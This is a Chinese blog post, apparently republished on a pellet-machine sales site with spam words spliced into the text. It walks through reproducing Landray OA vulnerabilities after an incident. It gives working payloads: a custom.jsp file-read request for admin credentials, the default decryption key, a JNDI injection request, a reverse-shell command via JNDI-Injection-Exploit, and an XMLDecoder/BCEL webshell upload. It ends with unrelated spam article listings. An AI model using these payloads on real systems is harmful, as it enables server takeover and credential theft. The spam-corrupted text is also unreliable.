解决方案

首页 > 解决方案 > 正文内容

蓝凌oa是用什么框架开发的(实战蓝凌OA系统漏洞复现拿shell-工具分享)蓝凌erp,不要告诉别人,

wangqiang1年前 (2023-11-26)解决方案955

应急响应缘由

通报发现境外黑客组织利用跳板对某公司蓝凌OA办公系统实施漏洞利用攻击并控制,要求及时督促涉事单位对问题进行整改,事件发生的原因的活就传到我手上了,虽然蓝凌OA系统的漏洞都是几年前早就公开的颗粒机,但是现在还是有一部分公司在使用低版本蓝凌OA系统,也就是因为使用过时的OA系统导致发生严重安全事件。

FOFA语句app="Landray-OA系统"

一、

任意文件读取漏洞描述蓝凌OA(EKP)存在任意颗粒机文件读取漏洞,构造恶意payload可以实现读取配置文件得到秘钥,实现登录admin.do页面。漏洞复现利用蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件拿到登录密码。访问/sys/ui颗粒机/extend/varkind/custom.jsp,抓包后

1、将GET请求修改为POST,并加上payload请求数据发送

var={"body":{"file":"/WEB-INF/KmssConf颗粒机ig/admin.properties"}}

2、注意构造的请求需要添加

Content-type: application/x-www-form-urlencoded

payload请求包

POST /sys颗粒机/ui/extend/varkind/custom.jsp HTTP/1.1User-Agent: Go-http-client/1.1Accept-Encoding: gzip, deflateCon颗粒机tent-Type: application/x-www-form-urlencodedHost: xx.xxxx.xxxxAccept: text/html, image/gif, image/jp颗粒机eg, *; q=.2, */*; q=.2Connection: closeContent-Length: 60var={"body":{"file":"/WEB-INF/KmssConfig/ad颗粒机min.properties"}}

获取到的password是/admin.do页面的登录密码,由于蓝凌OA默认是AES加密,并且默认密钥为kmssAdminKey,所以只要拿着password进行解颗粒机密就好。解密可行网站:https://www.qtool.net/des

下面是使用工具进行的测试,工具成功发现蓝凌OA的SSRF_JNDI漏洞,并且直接返回password。

二、SSRF+JNDI远程颗粒机命令执行漏洞描述蓝凌OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限。漏洞复现说明当可以登录adm颗粒机in.do后,可以在该页面抓包构造恶意请求来实现JNDI注入,payload请求包如下:POST /admin.do HTTP/1.1Host: Cookie: SECKEY_ABVK=fFfxSmGgwC颗粒机xPb4YX/Np8Myqx5lRiviM/yrqMs+vCzas%3D;Content-Length: 70Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Br颗粒机and";v="99", "Chromium";v="90", "Google Chrome";v="90"Sec-Ch-Ua-Mobile: ?0Upgrade-Insecure-Requests:颗粒机 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Origin颗粒机: https://X.X.X.XContent-Type: application/x-www-form-urlencodedAccept: image/avif,image/webp,image/颗粒机apng,image/svg+xml,image/*,*/*;q=0.8method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/dnslog可以颗粒机使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具开启一个rmi/ldap服务,此次事件的蓝凌OA系统该JNDI注入漏洞没有回显成功,但是通过dnslog测颗粒机试可以确定存在该漏洞,可惜迫于事态严重性和上级压力,网站事后当天就将OA系统关闭。我就不做细说明了,网上也有较多教程。具体步骤工具下载:https://github.com/welk1n/JNDI-I颗粒机njection-Exploit/releases/tag/v1.0开启rmi/jndi服务使用DNSLOG:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT颗粒机-all.jar -C"ping DNSLOG" -A IP开启rmi/jndi反弹shell:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar颗粒机 -C"bash -c {echo,bash反弹shell脚本base64编码}|{base64,-d}|{bash,-i}" -A IP发送带有payload的请求包:method=testDbCon颗粒机n&datasource=rmi://xxx.xxx.xxx.xxx:1099/dromo1

三、SysSearchMain.do XMLdecode反序列化(任意文件写入)漏洞描述蓝凌OA(EKP)存颗粒机在任意文件写入漏洞,属于典型的xmlDecoder反序列化。漏洞在/sys/search/sys_search_main/sysSearchMain.do下面。跟任意文件读取一样可以通过 custom颗粒机.jsp 文件未授权写入恶意文件,获取shell。漏洞复现当时由于事件紧急,需要尽快确定具体漏洞,一直在强调上级部门在等回复。我首当其冲就先用OA工具测一遍,果不其然漏洞还是跟往年一样原始不动的复现成颗粒机功。可以想到该公司使用的OA系统有多脆弱,还是在公网当中。先使用Liqun工具测试是否存在蓝凌OA漏洞,可以看出已经给出getshell链接和密码。

使用哥斯拉进行连接,我用的版本v4.0.1。拿到的是颗粒机普通用户权限,我后面没有进行提权。

具体漏洞的请求数据如下,主要问题在com.landray.kmss.sys.search.jar包中,对FdParameters参数过滤不严,将字符串数据传递给oje颗粒机ctXmlDecoder时造成反序列化。

payload

var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=颗粒机editParam"}}&fdParemNames=11&fdParameters=<java><void+class%3d"com.sun.org.apache.bcel.internal.util颗粒机.ClassLoader"> <void+method%3d"loadClass"> <string>$$BCEL$$$l$8b$……</string> <void+method%3d"newInstanc颗粒机e"></void> </void></void></java>

发送的shell代码可以使用哥斯拉自动生成,但是需要进行BCEL编码,下面是引用别人写的文章对BCEL Classloader的介绍和编颗粒机写的BCEL编码工具。

BCEL Classloader介绍:https://blog.csdn.net/xd_2021/article/details/121878806BCEL编码工具:https:/颗粒机/github.com/hunzi0/BCELCode该BCEL编码工具功能是对代码进行BCEL编码和解码,如有需要可以后台联系。运行步骤如下:

四、总结

漏洞都是两年前出现的高危漏洞,根据该事件可以看出颗粒机仍然有部分公司在使用存在已知漏洞的低版本蓝凌OA系统,并且根据通报是被境外黑客攻击控制。虽然漏洞复现很简单,但是该事件已是严重安全事件。文章主要是在基础的漏洞复现思路上使用安全工具来完成漏洞复现进行的颗粒机叙述。如有工具上的需求可以后台回复领取工具下载链接。

五、工具下载方法上面所涉及到的工具关注公众号,回复"LandrayOA"领取。

工具已添加相关的运行环境,工具清单如下:

本文所提及的工具仅供参考和学习颗粒机之用,作者不对读者使用这些工具所产生的任何损失或损害负责。读者在使用这些工具时请注意风险,并遵守相关条款和使用要求。如有侵权,请联系作者删除。

扫描二维码推送至手机访问。

版权声明:本文由木屑颗粒机_燃烧生物颗粒机那里有_生物质燃料颗粒机器设备发布,如需转载请注明出处。

转载请注明出处https://zqklj.cn/post/5922.html

分享给朋友:

相关文章

证件照电子版照片怎么弄(个人证件照电子版怎么弄?详细介绍制作流程!)个人电子证件照片怎么做,快来看,

证件照电子版照片怎么弄(个人证件照电子版怎么弄?详细介绍制作流程!)个人电子证件照片怎么做,快来看,

原标题:个人证件照电子版怎么弄?详细介绍制作流程! 在数字化时代,个人证件照电子版的需求与日俱增。无论是求职、注册社交媒体账号还是线上办理业务,我们都需要一张清晰、规范的证件照。那么...

ca电子证书是怎么回事(快速集成,灵活部署,CFCA电子签约平台开启电子合同新时代同桌为了报仇,把下半辈子都搭进去了,笑到肚子疼,你细品)cfca证书是什么意思,硬核推荐,

ca电子证书是怎么回事(快速集成,灵活部署,CFCA电子签约平台开启电子合同新时代同桌为了报仇,把下半辈子都搭进去了,笑到肚子疼,你细品)cfca证书是什么意思,硬核推荐,

随着信息技术的不断发展,企业数字化转型已进入到线上化、数字化、智能化的发展阶段。降本增效、安全合规作为推动企业数字化转型的核心诉求,安全高效的电子合同管理将成为企业信息化建设升级的必选方向。...

深圳数字证书办理需要什么资料(深圳数字证书线下办理网点注意事项和预约指引)深圳数字证书现在怎么那么难办理,怎么可以错过,

深圳数字证书办理需要什么资料(深圳数字证书线下办理网点注意事项和预约指引)深圳数字证书现在怎么那么难办理,怎么可以错过,

重点提示:必须本人带身份证原件到现场办理 深圳个人数字证书官方仅存受理网点: ●深圳市宝安区行政服务大厅斜对面网证通(罗田路西侧名门华府大厦1层112号店铺)...

电子证照如何生成(一键生成电子证件照,这些软件你不能错过)如何制作电子版的证件照,学到了,

电子证照如何生成(一键生成电子证件照,这些软件你不能错过)如何制作电子版的证件照,学到了,

原标题:一键生成电子证件照,这些软件你不能错过 无论是求职、考试还是办理各种证件,都需要提供电子版的证件照。那么手机怎么制作证件照软件呢?可以下载专业的证件照制作软件。下面来看看小编...

山东市场监管电子签名平台官方(山东市场监管电子签名平台入口:https://www.soyohui.com/app/193990/)山东市场监管电子签名平台企业登陆入口进不了,干货分享,

山东市场监管电子签名平台官方(山东市场监管电子签名平台入口:https://www.soyohui.com/app/193990/)山东市场监管电子签名平台企业登陆入口进不了,干货分享,

阅读本文前,请您先点击上面的蓝色字体,再点击“关注”,这样您就可以免费收到最新内容了。每天都有分享,完全是免费订阅,请放心关注。 声明:本文转载自网络,如有侵权,请在后台留言联系我们...

电子印章服务费计入什么科目(寿光市田柳镇:多措并举推进电子印章应用曾被千万人表白“我等你长大”,如今她27岁长成这样,网友:告辞了)电子印章服务商,一篇读懂,

电子印章服务费计入什么科目(寿光市田柳镇:多措并举推进电子印章应用曾被千万人表白“我等你长大”,如今她27岁长成这样,网友:告辞了)电子印章服务商,一篇读懂,

近日,田柳镇便民服务中心积极协助、指导企业群众申领和使用电子印章,电子印章的领取、签署、验签都完全免费。切实提高辖区企业电子印章使用率,助力优化营商环境。 工作人员指导企业...

现在,非常期待与您的又一次邂逅做木屑颗粒机我们是认真的!

我们努力让每一台锯末颗粒机的邂逅总能超越期待